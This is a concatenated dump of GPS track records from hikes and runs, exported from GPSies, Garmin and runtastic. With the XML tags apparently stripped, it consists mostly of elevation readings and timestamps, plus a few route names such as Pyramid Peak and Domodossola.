+2017-08-14T13:27:56Z
+
+
+
+
+1438.5999755859375
+2017-08-14T13:30:40Z
+
+
+
+
+1448.199951171875
+2017-08-14T13:31:40Z
+
+
+
+
+1452.0
+2017-08-14T13:32:13Z
+
+
+
+
+1454.5999755859375
+2017-08-14T13:32:34Z
+
+
+
+
+1467.199951171875
+2017-08-14T13:36:17Z
+
+
+
+
+1470.800048828125
+2017-08-14T13:38:16Z
+
+
+
+
+1476.199951171875
+2017-08-14T13:40:17Z
+
+
+
+
+1479.0
+2017-08-14T13:41:23Z
+
+
+
+
+1480.800048828125
+2017-08-14T13:41:41Z
+
+
+
+
+1494.5999755859375
+2017-08-14T13:43:19Z
+
+
+
+
+1521.0
+2017-08-14T13:46:17Z
+
+
+
+
+1529.4000244140625
+2017-08-14T13:47:24Z
+
+
+
+
+1533.199951171875
+2017-08-14T13:47:54Z
+
+
+
+
+1552.5999755859375
+2017-08-14T13:50:05Z
+
+
+
+
+1572.199951171875
+2017-08-14T13:52:10Z
+
+
+
+
+1610.800048828125
+2017-08-14T13:56:29Z
+
+
+
+
+1604.0
+2017-08-14T13:58:23Z
+
+
+
+
+1597.199951171875
+2017-08-14T14:00:15Z
+
+
+
+
+1588.0
+2017-08-14T14:03:45Z
+
+
+
+
+1586.0
+2017-08-14T14:04:14Z
+
+
+
+
+1581.5999755859375
+2017-08-14T14:04:58Z
+
+
+
+
+1581.199951171875
+2017-08-14T14:05:17Z
+
+
+
+
+1573.800048828125
+2017-08-14T14:08:09Z
+
+
+
+
+1578.5999755859375
+2017-08-14T14:09:14Z
+
+
+
+
+1583.0
+2017-08-14T14:10:11Z
+
+
+
+
+1592.5999755859375
+2017-08-14T14:12:39Z
+
+
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2017-04-16T18:23:41Z
+
+GPSies Track on GPSies.com
+
+
+
+883.0
+2010-01-01T00:00:00Z
+
+
+904.0
+2010-01-01T00:00:56Z
+
+
+915.0
+2010-01-01T00:01:36Z
+
+
+920.0
+2010-01-01T00:01:46Z
+
+
+946.0
+2010-01-01T00:03:03Z
+
+
+949.0
+2010-01-01T00:03:32Z
+
+
+960.0
+2010-01-01T00:04:01Z
+
+
+956.0
+2010-01-01T00:04:13Z
+
+
+980.0
+2010-01-01T00:05:18Z
+
+
+986.0
+2010-01-01T00:06:20Z
+
+
+997.0
+2010-01-01T00:06:56Z
+
+
+998.0
+2010-01-01T00:07:07Z
+
+
+992.0
+2010-01-01T00:07:27Z
+
+
+1000.0
+2010-01-01T00:07:40Z
+
+
+995.0
+2010-01-01T00:08:10Z
+
+
+1000.0
+2010-01-01T00:08:23Z
+
+
+1007.0
+2010-01-01T00:08:33Z
+
+
+1012.0
+2010-01-01T00:08:43Z
+
+
+1006.0
+2010-01-01T00:09:02Z
+
+
+1013.0
+2010-01-01T00:09:09Z
+
+
+1028.0
+2010-01-01T00:09:35Z
+
+
+1027.0
+2010-01-01T00:09:45Z
+
+
+1037.0
+2010-01-01T00:10:26Z
+
+
+1059.0
+2010-01-01T00:11:35Z
+
+
+1112.0
+2010-01-01T00:13:01Z
+
+
+1117.0
+2010-01-01T00:13:10Z
+
+
+1115.0
+2010-01-01T00:13:33Z
+
+
+1122.0
+2010-01-01T00:13:39Z
+
+
+1134.0
+2010-01-01T00:14:05Z
+
+
+1129.0
+2010-01-01T00:14:22Z
+
+
+1133.0
+2010-01-01T00:14:28Z
+
+
+1141.0
+2010-01-01T00:14:44Z
+
+
+1153.0
+2010-01-01T00:15:25Z
+
+
+1163.0
+2010-01-01T00:15:49Z
+
+
+1174.0
+2010-01-01T00:16:05Z
+
+
+1174.0
+2010-01-01T00:16:21Z
+
+
+1207.0
+2010-01-01T00:16:59Z
+
+
+1224.0
+2010-01-01T00:17:46Z
+
+
+1237.0
+2010-01-01T00:18:32Z
+
+
+1231.0
+2010-01-01T00:18:40Z
+
+
+1234.0
+2010-01-01T00:19:25Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2017-11-26T21:36:46Z
+
+GPSies Track on GPSies.com
+
+
+
+883.0
+2010-01-01T00:00:00Z
+
+
+891.0
+2010-01-01T00:00:19Z
+
+
+903.0
+2010-01-01T00:00:37Z
+
+
+902.0
+2010-01-01T00:00:56Z
+
+
+917.0
+2010-01-01T00:01:22Z
+
+
+936.0
+2010-01-01T00:02:02Z
+
+
+943.0
+2010-01-01T00:02:24Z
+
+
+975.0
+2010-01-01T00:03:08Z
+
+
+980.0
+2010-01-01T00:03:36Z
+
+
+1002.0
+2010-01-01T00:03:56Z
+
+
+1003.0
+2010-01-01T00:04:15Z
+
+
+1007.0
+2010-01-01T00:04:27Z
+
+
+1044.0
+2010-01-01T00:06:18Z
+
+
+1046.0
+2010-01-01T00:06:46Z
+
+
+1057.0
+2010-01-01T00:07:36Z
+
+
+1067.0
+2010-01-01T00:07:56Z
+
+
+1084.0
+2010-01-01T00:08:10Z
+
+
+1144.0
+2010-01-01T00:09:24Z
+
+
+1161.0
+2010-01-01T00:10:16Z
+
+
+1183.0
+2010-01-01T00:11:47Z
+
+
+1195.0
+2010-01-01T00:12:34Z
+
+
+1207.0
+2010-01-01T00:13:03Z
+
+
+1202.0
+2010-01-01T00:14:01Z
+
+
+1194.0
+2010-01-01T00:14:39Z
+
+
+1222.0
+2010-01-01T00:15:17Z
+
+
+1234.0
+2010-01-01T00:15:38Z
+
+
+1244.0
+2010-01-01T00:16:03Z
+
+
+1296.0
+2010-01-01T00:17:11Z
+
+
+1294.0
+2010-01-01T00:17:28Z
+
+
+1315.0
+2010-01-01T00:18:09Z
+
+
+1335.0
+2010-01-01T00:18:53Z
+
+
+1398.0
+2010-01-01T00:20:54Z
+
+
+1426.0
+2010-01-01T00:21:58Z
+
+
+1450.0
+2010-01-01T00:22:35Z
+
+
+1467.0
+2010-01-01T00:23:06Z
+
+
+1481.0
+2010-01-01T00:23:31Z
+
+
+1484.0
+2010-01-01T00:24:27Z
+
+
+1504.0
+2010-01-01T00:24:59Z
+
+
+1558.0
+2010-01-01T00:26:28Z
+
+
+1581.0
+2010-01-01T00:26:46Z
+
+
+1590.0
+2010-01-01T00:27:09Z
+
+
+1596.0
+2010-01-01T00:27:15Z
+
+
+1596.0
+2010-01-01T00:27:28Z
+
+
+1600.0
+2010-01-01T00:27:36Z
+
+
+1605.0
+2010-01-01T00:27:59Z
+
+
+1608.0
+2010-01-01T00:28:05Z
+
+
+1629.0
+2010-01-01T00:28:49Z
+
+
+1655.0
+2010-01-01T00:29:11Z
+
+
+1681.0
+2010-01-01T00:29:35Z
+
+
+1711.0
+2010-01-01T00:30:17Z
+
+
+1718.0
+2010-01-01T00:30:36Z
+
+
+1723.0
+2010-01-01T00:30:48Z
+
+
+1723.0
+2010-01-01T00:31:08Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-09-23T20:47:43Z
+
+
+160922-mm-wand-3000m-59min-125HM
+
+
+
+
+
+
+278.0
+2016-09-22T10:12:27Z
+
+
+275.0
+2016-09-22T10:14:01Z
+
+
+269.0
+2016-09-22T10:18:13Z
+
+
+272.0
+2016-09-22T10:21:41Z
+
+
+286.0
+2016-09-22T10:24:53Z
+
+
+301.0
+2016-09-22T10:28:50Z
+
+
+290.0
+2016-09-22T10:31:39Z
+
+
+269.0
+2016-09-22T10:35:13Z
+
+
+276.0
+2016-09-22T10:37:19Z
+
+
+293.0
+2016-09-22T10:38:36Z
+
+
+289.0
+2016-09-22T10:38:52Z
+
+
+278.0
+2016-09-22T10:39:08Z
+
+
+271.0
+2016-09-22T10:44:18Z
+
+
+285.0
+2016-09-22T10:46:37Z
+
+
+296.0
+2016-09-22T10:49:52Z
+
+
+289.0
+2016-09-22T10:53:15Z
+
+
+288.0
+2016-09-22T10:54:04Z
+
+
+270.0
+2016-09-22T10:57:12Z
+
+
+272.0
+2016-09-22T10:57:40Z
+
+
+270.0
+2016-09-22T11:02:56Z
+
+
+273.0
+2016-09-22T11:05:32Z
+
+
+272.0
+2016-09-22T11:06:45Z
+
+
+277.0
+2016-09-22T11:09:14Z
+
+
+279.0
+2016-09-22T11:11:55Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-09-16T11:19:48Z
+
+2015-09-16 13:19:47
+
+
+
+
+
+
+1797.66
+2015-09-16T11:13:10Z
+
+
+1796.36
+2015-09-16T11:14:17Z
+
+
+1797.75
+2015-09-16T11:14:45Z
+
+
+1797.5
+2015-09-16T11:15:28Z
+
+
+1813.34
+2015-09-16T11:17:12Z
+
+
+1834.99
+2015-09-16T11:19:00Z
+ "
+"
+
+
+
+Federal Office of Topography Switzerland
+
+
+
+
+
+
+
+2015-05-25T11:17:08Z
+
+
+2015-05-25T11:17:08Z
+
+
+2015-05-25T11:19:08Z
+
+
+2015-05-25T11:20:08Z
+
+
+2015-05-25T11:23:08Z
+
+
+2015-05-25T11:26:08Z
+
+
+2015-05-25T11:29:08Z
+
+
+2015-05-25T11:30:08Z
+
+
+2015-05-25T11:32:08Z
+
+
+2015-05-25T11:34:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:37:08Z
+
+
+2015-05-25T11:39:08Z
+
+
+2015-05-25T11:41:08Z
+
+
+2015-05-25T11:44:08Z
+
+
+2015-05-25T11:45:08Z
+
+
+2015-05-25T11:46:08Z
+
+
+2015-05-25T11:47:08Z
+
+
+2015-05-25T11:54:08Z
+
+
+2015-05-25T11:56:08Z
+
+
+2015-05-25T12:01:08Z
+
+
+2015-05-25T12:02:08Z
+
+
+2015-05-25T12:03:08Z
+
+
+2015-05-25T12:05:08Z
+
+
+2015-05-25T12:07:08Z
+
+
+2015-05-25T12:08:08Z
+
+
+2015-05-25T12:10:08Z
+
+
+2015-05-25T12:10:08Z
+
+
+2015-05-25T12:14:08Z
+
+
+2015-05-25T12:17:08Z
+
+
+2015-05-25T12:17:08Z
+
+
+2015-05-25T12:21:08Z
+
+
+2015-05-25T12:23:08Z
+
+
+2015-05-25T12:27:08Z
+
+
+2015-05-25T12:29:08Z
+
+
+2015-05-25T12:30:08Z
+
+
+2015-05-25T12:32:08Z
+
+
+2015-05-25T12:35:08Z
+
+
+2015-05-25T12:44:08Z
+
+
+2015-05-25T12:44:08Z
+
+
+2015-05-25T12:52:08Z
+
+
+2015-05-25T12:54:08Z
+
+
+2015-05-25T12:57:08Z
+
+
+2015-05-25T13:01:08Z
+
+
+2015-05-25T13:07:08Z
+
+
+2015-05-25T13:08:08Z
+
+
+2015-05-25T13:12:08Z
+
+
+2015-05-25T13:14:08Z
+
+
+2015-05-25T13:15:08Z
+
+
+2015-05-25T13:17:08Z
+
+
+2015-05-25T13:17:08Z
+
+
+2015-05-25T13:19:08Z
+
+
+2015-05-25T13:23:08Z
+
+
+2015-05-25T13:25:08Z
+
+
+2015-05-25T13:26:08Z
+
+
+2015-05-25T13:31:08Z
+
+
+2015-05-25T13:36:08Z
+
+
+2015-05-25T13:37:08Z
+
+
+2015-05-25T13:40:08Z
+
+
+2015-05-25T13:40:08Z
+
+
+2015-05-25T13:43:08Z
+
+
+2015-05-25T13:44:08Z
+
+
+2015-05-25T13:48:08Z
+
+
+2015-05-25T13:48:08Z
+
+
+2015-05-25T13:48:08Z
+
+
+2015-05-25T13:51:08Z
+
+
+2015-05-25T13:52:08Z
+
+
+2015-05-25T13:56:08Z
+
+
+2015-05-25T13:57:08Z
+
+
+2015-05-25T13:57:08Z
+ "
+"
+
+
+
+
+
+
+2016-07-18T00:26:44Z
+
+
+Gooseneck Lockout
+
+
+
+1440.0
+2016-07-18T00:26:44Z
+
+
+
+
+0.000000
+
+1439.0
+2016-07-18T00:27:52Z
+
+
+
+
+2.397728
+
+1441.0
+2016-07-18T00:28:31Z
+
+
+
+
+7.760750
+
+1452.0
+2016-07-18T00:31:13Z
+
+
+
+
+9.942017
+
+1458.0
+2016-07-18T00:32:43Z
+
+
+
+
+4.994385
+
+1464.0
+2016-07-18T00:33:51Z
+
+
+
+
+7.079712
+
+1464.0
+2016-07-18T00:34:22Z
+
+
+
+
+3.648956
+
+1466.0
+2016-07-18T00:37:58Z
+
+
+
+
+1.642639
+
+1464.0
+2016-07-18T00:39:40Z
+
+
+
+
+8.596558
+
+1463.0
+2016-07-18T00:44:17Z
+
+
+
+
+2.645508
+
+1460.0
+2016-07-18T00:45:48Z
+
+
+
+
+8.176697
+
+1453.0
+2016-07-18T00:47:55Z
+
+
+
+
+6.428833
+
+1443.0
+2016-07-18T00:50:02Z
+
+
+
+
+9.906738
+
+1440.0
+2016-07-18T00:52:25Z
+
+
+
+
+1.986694 "
+"
+
+
+Hegauer Kegelspiel ( VIII ) : "" Hewensteig ""
+
+
+
+2017
+http://www.runtastic.com
+
+runtastic
+2017-07-23T12:56:46Z
+
+
+Um deine Aktivitäten anzusehen gehe auf Runtastic.com
+
+
+582.7000122070312
+2017-07-23T10:56:46Z
+
+
+578.3699951171875
+2017-07-23T10:58:46Z
+
+
+593.27001953125
+2017-07-23T10:59:46Z
+
+
+603.8499755859375
+2017-07-23T11:00:46Z
+
+
+627.8800048828125
+2017-07-23T11:03:16Z
+
+
+636.0499877929688
+2017-07-23T11:04:16Z
+
+
+658.1599731445312
+2017-07-23T11:06:16Z
+
+
+667.77001953125
+2017-07-23T11:07:16Z
+
+
+688.9199829101562
+2017-07-23T11:08:46Z
+
+
+718.239990234375
+2017-07-23T11:10:46Z
+
+
+748.0399780273438
+2017-07-23T11:13:46Z
+
+
+751.8900146484375
+2017-07-23T11:14:16Z
+
+
+767.27001953125
+2017-07-23T11:15:16Z
+
+
+781.2100219726562
+2017-07-23T11:16:16Z
+
+
+798.030029296875
+2017-07-23T11:17:46Z
+
+
+821.5800170898438
+2017-07-23T11:20:16Z
+
+
+828.3099975585938
+2017-07-23T11:20:46Z
+
+
+831.6799926757812
+2017-07-23T11:21:16Z
+
+
+837.4500122070312
+2017-07-23T11:22:16Z
+
+
+845.6199951171875
+2017-07-23T11:22:46Z
+
+
+848.5
+2017-07-23T11:23:16Z
+
+
+861.47998046875
+2017-07-23T11:32:16Z
+
+
+849.4600219726562
+2017-07-23T11:33:46Z
+
+
+851.8699951171875
+2017-07-23T11:34:16Z
+
+
+851.8699951171875
+2017-07-23T11:35:46Z
+
+
+847.5399780273438
+2017-07-23T11:38:16Z
+
+
+838.8900146484375
+2017-07-23T11:39:16Z
+
+
+830.719970703125
+2017-07-23T11:39:46Z
+
+
+829.27001953125
+2017-07-23T11:40:16Z
+
+
+823.030029296875
+2017-07-23T11:40:46Z
+
+
+812.4500122070312
+2017-07-23T11:41:16Z
+
+
+785.0499877929688
+2017-07-23T11:43:16Z
+
+
+777.3599853515625
+2017-07-23T11:43:46Z
+
+
+756.6900024414062
+2017-07-23T11:45:16Z
+
+
+740.3499755859375
+2017-07-23T11:46:16Z
+
+
+711.510009765625
+2017-07-23T11:49:46Z
+
+
+698.0499877929688
+2017-07-23T11:51:46Z
+
+
+691.3300170898438
+2017-07-23T11:52:16Z
+
+
+684.5999755859375
+2017-07-23T11:52:46Z
+
+
+683.1500244140625
+2017-07-23T11:53:16Z
+
+
+663.9299926757812
+2017-07-23T11:54:16Z
+
+
+643.739990234375
+2017-07-23T11:55:16Z
+
+
+638.9299926757812
+2017-07-23T11:55:46Z
+
+
+591.3499755859375
+2017-07-23T11:58:46Z
+
+
+567.7999877929688
+2017-07-23T11:59:46Z
+
+
+575.969970703125
+2017-07-23T12:02:16Z
+
+
+576.9299926757812
+2017-07-23T12:07:46Z
+
+
+575.489990234375
+2017-07-23T12:09:16Z
+
+
+574.530029296875
+2017-07-23T12:10:46Z
+
+
+575.010009765625
+2017-07-23T12:12:16Z
+
+
+583.1799926757812
+2017-07-23T12:12:46Z
+
+
+602.4000244140625
+2017-07-23T12:14:16Z
+
+
+612.02001953125
+2017-07-23T12:15:46Z
+
+
+618.75
+2017-07-23T12:17:16Z
+
+
+616.8200073242188
+2017-07-23T12:18:46Z
+
+
+615.3800048828125
+2017-07-23T12:20:46Z
+
+
+616.3400268554688
+2017-07-23T12:21:46Z
+
+
+612.5
+2017-07-23T12:24:16Z
+
+
+611.0599975585938
+2017-07-23T12:24:46Z
+
+
+601.9199829101562
+2017-07-23T12:25:16Z
+
+
+592.3099975585938
+2017-07-23T12:25:46Z
+
+
+576.9299926757812
+2017-07-23T12:27:46Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-01-08T14:40:48Z
+
+
+2017-01-08 13:12:01
+
+
+
+
+
+
+
+
+572.62
+2017-01-08T11:50:13Z
+
+
+574.14
+2017-01-08T11:52:28Z
+
+
+579.98
+2017-01-08T11:53:12Z
+
+
+586.08
+2017-01-08T11:55:07Z
+
+
+585.81
+2017-01-08T11:55:20Z
+
+
+584.96
+2017-01-08T11:55:56Z
+
+
+576.87
+2017-01-08T11:57:35Z
+
+
+581.76
+2017-01-08T12:00:57Z
+
+
+579.32
+2017-01-08T12:05:18Z
+
+
+580.91
+2017-01-08T12:06:21Z
+
+
+579.57
+2017-01-08T12:08:02Z
+
+
+568.52
+2017-01-08T12:09:10Z
+
+
+557.35
+2017-01-08T12:11:14Z
+
+
+555.58
+2017-01-08T12:11:32Z
+
+
+538.07
+2017-01-08T12:11:58Z
+ "
+"
+
+
+tälle
+
+
+
+
+
+
+
+
+
+952.8
+
+
+958.9987592998352
+
+
+968.0219653179191
+
+
+994.3
+
+
+1004.3
+
+
+1010.4999349778083
+
+
+1008.900004654678
+
+
+1004.700021573092
+
+
+1010.1000861280388
+
+
+1016.9000737604028
+
+
+1019.6000030820687
+
+
+1025.1000348437276
+
+
+1034.1000250758887
+
+
+1041.3999661808673
+
+
+1050.900068565674
+
+
+1073.9000204466377
+
+
+1132.199832733072
+
+
+1181.4
+
+
+1193.6
+
+
+1208.6
+
+
+1243.399939888051
+
+
+1249.1000174955263
+
+
+1257.0999676666709
+
+
+1258.6
+
+
+1262.1000506573134
+
+
+1286.7001900592898
+
+
+1308.6998659139788
+
+
+1323.09983738552
+
+
+1343.1000190336008
+
+
+1365.0000321562231
+
+
+1378.5999514201467
+
+
+1401.099974727626
+
+
+1431.1000527883684
+
+
+1448.1
+
+
+1452.3999845046244
+
+
+1502.8
+
+
+1647.2
+
+
+1681.4077431536969
+
+
+1705.0
+
+
+1740.8
+
+
+1757.5
+
+
+1771.3
+
+
+1788.8
+
+
+1766.5
+
+
+1751.4197330791228
+
+
+1726.5
+
+
+1704.5
+
+
+1705.7
+
+
+1702.9407497161278
+
+
+1623.4
+
+
+1571.0
+
+
+1555.4
+
+
+1544.0
+
+
+1494.8997444341055
+
+
+1447.3
+
+
+1431.1000527891745
+
+
+1401.0999747279334
+
+
+1378.599951421546
+
+
+1365.0000321562231
+
+
+1343.1000190336
+
+
+1323.0998373870266
+
+
+1308.6998659139788
+
+
+1286.7001900592898
+
+
+1262.1000506573134
+
+
+1258.6
+
+
+1257.0999676666424
+
+
+1249.1000174954982
+
+
+1243.3999398880703
+
+
+1213.0000597798423
+
+
+1196.6000133316006
+
+
+1186.8999514138895
+
+
+1175.100012109621
+
+
+1132.1998327331103
+
+
+1073.900020446673
+
+
+1050.9000685657477
+
+
+1041.3999661808748
+
+
+1033.4000075107842
+
+
+1025.9000278749877
+
+
+1021.5000342927032
+
+
+1018.599999200235
+
+
+1010.100086128046
+
+
+1004.7000215730908
+
+
+1008.9000046546759
+
+
+1010.2999993299651
+
+
+1004.7
+
+
+995.1
+
+
+960.0
+
+
+956.0
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-01-06T13:22:07Z
+
+BOLLTT-14 14:21:59
+
+
+
+
+
+819.18
+2014-01-06T11:04:04Z
+
+
+828.79
+2014-01-06T11:06:51Z
+
+
+843.69
+2014-01-06T11:07:57Z
+
+
+908.58
+2014-01-06T11:10:05Z
+
+
+919.64
+2014-01-06T11:11:08Z
+
+
+927.81
+2014-01-06T11:12:54Z
+
+
+945.11
+2014-01-06T11:14:29Z
+
+
+948.96
+2014-01-06T11:15:06Z
+
+
+969.63
+2014-01-06T11:18:00Z
+
+
+979.72
+2014-01-06T11:21:01Z
+
+
+984.05
+2014-01-06T11:21:55Z
+
+
+995.1
+2014-01-06T11:23:30Z
+
+
+1012.89
+2014-01-06T11:26:56Z
+
+
+1018.17
+2014-01-06T11:27:54Z
+
+
+1022.02
+2014-01-06T11:28:35Z
+
+
+1048.94
+2014-01-06T11:31:36Z
+
+
+1089.79
+2014-01-06T11:36:25Z
+
+
+1101.81
+2014-01-06T11:37:40Z
+
+
+1111.9
+2014-01-06T11:38:53Z
+
+
+1122.48
+2014-01-06T11:39:54Z
+
+
+1133.53
+2014-01-06T11:40:52Z
+
+
+1139.3
+2014-01-06T11:41:21Z
+
+
+1153.72
+2014-01-06T11:43:35Z
+
+
+1175.83
+2014-01-06T11:45:49Z
+
+
+1198.9
+2014-01-06T11:48:42Z
+
+
+1200.34
+2014-01-06T11:49:45Z
+
+
+1186.88
+2014-01-06T11:50:44Z
+
+
+1182.56
+2014-01-06T11:53:42Z
+
+
+1191.69
+2014-01-06T11:56:19Z
+
+
+1216.69
+2014-01-06T11:58:54Z
+
+
+1226.78
+2014-01-06T12:00:10Z
+
+
+1269.08
+2014-01-06T12:05:48Z
+
+
+1285.9
+2014-01-06T12:07:45Z
+
+
+1295.51
+2014-01-06T12:09:47Z
+
+
+1307.05
+2014-01-06T12:13:49Z
+
+
+1211.88
+2014-01-06T12:49:02Z
+
+
+1194.09
+2014-01-06T12:51:06Z
+
+
+1193.13
+2014-01-06T12:51:39Z
+
+
+1170.06
+2014-01-06T12:53:32Z
+
+
+1142.66
+2014-01-06T12:55:38Z
+
+
+1127.76
+2014-01-06T12:56:54Z
+
+
+1114.79
+2014-01-06T12:57:32Z
+
+
+1100.85
+2014-01-06T12:58:16Z
+
+
+1069.12
+2014-01-06T12:59:57Z
+
+
+1050.86
+2014-01-06T13:01:13Z
+
+
+1047.49
+2014-01-06T13:01:36Z
+
+
+1044.61
+2014-01-06T13:01:56Z
+
+
+1016.73
+2014-01-06T13:03:46Z
+
+
+986.93
+2014-01-06T13:05:21Z
+
+
+948.48
+2014-01-06T13:07:36Z
+
+
+935.5
+2014-01-06T13:08:18Z
+
+
+896.57
+2014-01-06T13:11:15Z
+
+
+891.76
+2014-01-06T13:12:38Z
+
+
+892.24
+2014-01-06T13:13:09Z
+
+
+893.68
+2014-01-06T13:14:35Z
+
+
+888.4
+2014-01-06T13:16:17Z
+
+
+882.15
+2014-01-06T13:21:33Z
+
+
+874.94
+2014-01-06T13:22:05Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Pyramid Peak
+
+360gps
+
+360gps on GPSies.com
+GPSiesUserOnWeb
+
+
+Pyramid Peak on GPSies.com
+trackOnWeb
+2014-01-11T22:53:42Z
+
+round trip
+1194.0
+13168.36025178009
+1824.0
+3007.0
+1124.0
+
+Pyramid Peak on GPSies.com
+
+trackOnWeb
+
+
+1885.0
+2010-01-01T00:00:00Z
+
+
+1881.0
+2010-01-01T00:00:11Z
+
+
+1875.0
+2010-01-01T00:00:22Z
+
+
+1881.0
+2010-01-01T00:01:11Z
+
+
+1894.0
+2010-01-01T00:02:45Z
+
+
+1927.0
+2010-01-01T00:03:50Z
+
+
+1945.0
+2010-01-01T00:05:23Z
+
+
+1957.0
+2010-01-01T00:06:58Z
+
+
+1974.0
+2010-01-01T00:08:16Z
+
+
+1990.0
+2010-01-01T00:09:17Z
+
+
+1998.0
+2010-01-01T00:10:53Z
+
+
+2014.0
+2010-01-01T00:11:54Z
+
+
+2040.0
+2010-01-01T00:13:18Z
+
+
+2101.0
+2010-01-01T00:14:08Z
+
+
+2143.0
+2010-01-01T00:14:38Z
+
+
+2153.0
+2010-01-01T00:15:11Z
+
+
+2226.0
+2010-01-01T00:16:07Z
+
+
+2278.0
+2010-01-01T00:17:25Z
+
+
+2297.0
+2010-01-01T00:18:07Z
+
+
+2311.0
+2010-01-01T00:18:58Z
+
+
+2338.0
+2010-01-01T00:20:52Z
+
+
+2337.0
+2010-01-01T00:23:08Z
+
+
+2333.0
+2010-01-01T00:24:02Z
+
+
+2339.0
+2010-01-01T00:24:48Z
+
+
+2350.0
+2010-01-01T00:25:55Z
+
+
+2350.0
+2010-01-01T00:26:42Z
+
+
+2349.0
+2010-01-01T00:27:27Z
+
+
+2405.0
+2010-01-01T00:29:01Z
+
+
+2435.0
+2010-01-01T00:30:27Z
+
+
+2451.0
+2010-01-01T00:31:08Z
+
+
+2472.0
+2010-01-01T00:33:32Z
+
+
+2488.0
+2010-01-01T00:34:03Z
+
+
+2616.0
+2010-01-01T00:35:53Z
+
+
+2711.0
+2010-01-01T00:37:49Z
+
+
+2777.0
+2010-01-01T00:38:51Z
+
+
+2830.0
+2010-01-01T00:39:34Z
+
+
+2857.0
+2010-01-01T00:39:54Z
+
+
+2925.0
+2010-01-01T00:40:31Z
+
+
+2969.0
+2010-01-01T00:40:55Z
+
+
+3004.0
+2010-01-01T00:41:25Z
+
+
+3007.0
+2010-01-01T00:41:41Z
+
+
+2982.0
+2010-01-01T00:42:45Z
+
+
+2855.0
+2010-01-01T00:45:08Z
+
+
+2819.0
+2010-01-01T00:45:44Z
+
+
+2801.0
+2010-01-01T00:46:13Z
+
+
+2629.0
+2010-01-01T00:50:30Z
+
+
+2580.0
+2010-01-01T00:52:06Z
+
+
+2565.0
+2010-01-01T00:52:42Z
+
+
+2548.0
+2010-01-01T00:53:21Z
+
+
+2540.0
+2010-01-01T00:53:48Z
+
+
+2530.0
+2010-01-01T00:54:19Z
+
+
+2523.0
+2010-01-01T00:54:52Z
+
+
+2423.0
+2010-01-01T00:57:30Z
+
+
+2334.0
+2010-01-01T01:00:44Z
+
+
+2317.0
+2010-01-01T01:01:26Z
+
+
+2259.0
+2010-01-01T01:03:30Z
+
+
+2205.0
+2010-01-01T01:05:05Z
+
+
+2095.0
+2010-01-01T01:07:38Z
+
+
+2068.0
+2010-01-01T01:08:14Z
+
+
+2032.0
+2010-01-01T01:08:58Z
+
+
+1851.0
+2010-01-01T01:11:45Z
+
+
+1824.0
+2010-01-01T01:12:15Z
+
+
+1838.0
+2010-01-01T01:12:56Z
+
+
+1834.0
+2010-01-01T01:14:47Z
+
+
+1866.0
+2010-01-01T01:16:59Z
+
+
+1879.0
+2010-01-01T01:18:28Z
+
+
+1882.0
+2010-01-01T01:18:40Z
+
+
+1883.0
+2010-01-01T01:18:49Z
+
+
+1884.0
+2010-01-01T01:19:00Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Domodossola
+
+Monika Teusch - Community
+
+
+
+2016-11-10T19:19:32Z
+
+Domodossola
+Rundtour
+
+
+
+274.31732
+
+
+279.69073
+
+
+281.85973
+
+
+284.54894
+
+
+284.58732
+
+
+285.95715
+
+
+286.33786
+
+
+289.98692
+
+
+292.64999
+
+
+302.00236
+
+
+306.09865
+
+
+308.80188
+
+
+310.89603
+
+
+313.05613
+
+
+313.03587
+
+
+318.16095
+
+
+331.07102
+
+
+311.36596
+
+
+307.55663
+
+
+295.55157
+
+
+290.37705
+
+
+291.55264
+
+
+291.77661
+
+
+292.11427
+
+
+290.58607
+
+
+290.21015
+
+
+285.34816
+
+
+285.37911
+
+
+285.13145
+
+
+284.89686
+
+
+284.83391
+
+
+279.83003
+
+
+274.26701
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-10-13T09:43:44Z
+
+2015-10-13 11:43:42
+
+
+
+
+
+
+917.21
+2015-10-13T08:33:36Z
+
+
+918.09
+2015-10-13T08:34:24Z
+
+
+921.05
+2015-10-13T08:35:07Z
+
+
+905.85
+2015-10-13T08:37:27Z
+
+
+905.8
+2015-10-13T08:38:50Z
+
+
+917.91
+2015-10-13T08:40:56Z
+
+
+926.31
+2015-10-13T08:41:43Z
+
+
+940.27
+2015-10-13T08:42:35Z
+
+
+950.65
+2015-10-13T08:43:22Z
+
+
+951.68
+2015-10-13T08:44:03Z
+
+
+951.69
+2015-10-13T08:44:25Z
+
+
+952.15
+2015-10-13T08:45:14Z
+
+
+956.89
+2015-10-13T08:46:04Z
+
+
+960.38
+2015-10-13T08:46:38Z
+
+
+968.28
+2015-10-13T08:49:49Z
+
+
+972.91
+2015-10-13T08:50:19Z
+
+
+977.55
+2015-10-13T08:50:45Z
+
+
+980.9
+2015-10-13T08:51:09Z
+
+
+987.28
+2015-10-13T08:51:38Z
+
+
+1008.46
+2015-10-13T08:53:18Z
+
+
+1019.42
+2015-10-13T08:54:37Z
+
+
+1020.36
+2015-10-13T09:00:43Z
+
+
+1013.65
+2015-10-13T09:01:23Z
+
+
+994.53
+2015-10-13T09:02:45Z
+
+
+985.01
+2015-10-13T09:03:16Z
+
+
+981.88
+2015-10-13T09:03:28Z
+
+
+978.58
+2015-10-13T09:03:46Z
+
+
+972.11
+2015-10-13T09:04:14Z
+
+
+962.61
+2015-10-13T09:04:53Z
+
+
+961.7
+2015-10-13T09:05:44Z
+
+
+959.75
+2015-10-13T09:06:31Z
+
+
+956.15
